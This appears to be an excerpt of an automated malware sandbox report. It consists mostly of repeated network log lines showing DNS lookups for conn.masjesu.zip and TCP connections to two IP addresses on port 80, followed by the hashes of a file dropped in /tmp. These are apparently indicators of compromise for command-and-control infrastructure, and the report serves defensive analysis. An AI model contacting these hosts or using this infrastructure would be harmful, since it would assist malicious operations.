US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97